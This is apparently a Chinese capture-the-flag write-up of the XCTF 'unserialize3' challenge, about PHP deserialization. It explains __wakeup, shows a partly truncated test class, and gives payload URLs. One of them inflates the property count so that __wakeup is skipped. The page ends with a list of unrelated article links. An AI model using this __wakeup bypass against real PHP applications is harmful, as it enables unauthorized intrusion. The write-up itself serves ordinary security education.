xctf的unserialize3反序列化
创始人
2025-05-28 21:53:09

在这里插入图片描述

php反序列化

魔术方法 _wakeup()
unserialize() 将已序列化的字符串还原回 PHP 的值,unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源
漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

测试序列化

可以搞一个测试脚本

                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
$peak = new xctf();           //使用new运算符来实例化该类(xctf)的对象为peak
echo(serialize($peak));       //输出被序列化的对象(peak)
?>

得到序列化后的是

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

其中,序列化字符串各部分简单释义:
O代表结构类型为类:4表示类名长度:"xctf"是类名:属性(成员)个数1:{属性名类型s:长度4:名称flag;值类型s:长度3:值111}

构造payload

http://61.147.171.105:53594/?code=O:4:%22xctf%22:1:{s:4:%22flag%22;s:3:%22111%22;}
在这里插入图片描述
显示bad request,需要绕过_wake up()函数

将属性个数改为大于1的数字,绕过_wake up()

输入http://61.147.171.105:53594/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
在这里插入图片描述

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:总结低代码海报平台编辑器难点

下一篇:js 面试题 常用的数组方法有哪些?

相关内容

热门资讯

【数据结构】KMP算法细节详解 KMP算法细节详解前言一、字符串匹配问题1.BF算法2.KMP算法二、next数组三、手写nex思想...
【中间间】Redis与MySQ... 文章目录前言谈谈一致性三个经典的缓存模式Cache-Aside PatternCache-Aside...
【CSS】盒子模型内边距 ④ ... 文章目录一、盒子模型内部尺寸计算1、设置内边距和边框对盒子模型的影响2、盒子模型尺寸计算二、代码示例...
TIA博途中添加程序注释的具体... TIA博途中添加程序注释的具体方法示例_汇总 添加程序注释可以帮助自己和阅读程序的技术人员更好地理...
[LsSDK][tool] l... 文章目录一、首先是界面介绍。二、工具的目的三、ls_gpio.h模板四、ls_syscfg.h 模板...
Linux的目录结构 目录 一:重要性和基本介绍 二:目录结构​编辑 ​编辑 2.1 bin...
java中IO流的操作 对于java中io流的一些操作和类进行总结 io流的分类:  字节流:...
HydroD 实用教程(七)静... 目 录一、前言二、稳性分析三、Hydrostatic Rule Checks四、AVCG Analy...
记录使用Dockerfile来... 一准备一个安装了docker的虚拟机 首先准备一个安装好了docker的虚拟机,我的d...
Nginx学习笔记(三)Lin... 目录一、官网下载二、配置基本信息1.上传 Linux2.解压3.安装编译环境4.执行命令4.1 配置...
怎样展示你在项目中的重要性? 今天我们聊聊面试中,怎样介绍你的项目,以及怎样突出你的重要性。面试中除了...
LA-Lib库c++环境下的编... 下载地址一:GitHub仓库 下载地址二:(内含己编译一个...
在 AI 上训练 AI:Cha... ChatGPT 可以像 Linux 终端一样运行,并在给出以下提示时返回执行结果。下面...
import 或者requir... 最近看别人写的源码时发现一个有趣的现象, import {promises as f...
通过sysfs文件系统接口来改... 通过sysfs文件系统接口来改变内核模块中的变量值(二) 文章目录通过...
JavaWeb《一》概念、服务... 🍎道阻且长,行则将至。🍓 本文是javaweb的...
iOS上架App Store详... 上架基本需求资料 1、苹果开发者账号(如还没账号先申请- 苹果开发者账号申请教程&#x...
【LeetCode每日一题】—... 文章目录一【题目类别】二【题目难度】三【题目编号】四【题目描述】五【题目示例】六【解题思路】七【题目...
代码随想录算法训练营第三十五天... 860.柠檬水找零 题目链接 思路: 情况一:账单是5,直...
VsCoe离线安装插件【步骤+... 文章目录1、下载插件2、安装 svn插件为例2.1、下载插件2.2、安装2.3、查看安装插件 前言...
【C++】13.多态 1.多态的概念 通俗来说,就是多种形态,具体点就是去完成某个行为...
光伏并网逆变器学习1-simu... 分为三个部分:光伏电池 、 boost+mppt 、 并网逆变 光伏电池&#...
WEB前端第三次作业——CSS... WEB前端第三次作业——CSS样式案例 做出如下图中的效果 用到的图片素材均来源于对应网站源代码 ...
Liunx下的进程空间地址理解... 文章目录前言1.进程空间地址1.从编程语言角度理解地址的划分2.进程虚拟地址3.扩展1.为啥要有虚拟...
【尊享版】你真的会休息吗?如何... 超友们,早上好~ 今天我为你带来的分享是《你真的会休息吗?如何开始正确的...
数据更新 | CnOpenDa... 证券从业人员信息数据 一、数据简介   证券从业人员是指被中国证监会依法批准的证券从业机构正式聘用或...
HTML 音频(Audio) HTML 音频(Audio) 声音在HTML中可以以不同的方式播放. 问题以及解决方法 在 HTML...
树莓派/linux/ubunt... 问题描述需要给树莓派设置静态ip并且要可以连接网络。但实际情况是有静态ip时:ping...
C语言指针操作(十)动态内存分... 目录 一、什么是内存的动态分配 二、怎样建立内存的动态分配 2.1用malloc函数开辟动态存储区 ...
测试怎么做到尽可能全和尽可能快 需求 目标 就上面这样一个很简单的功能点,但是他的测试数据产品一共给了6K多条 本...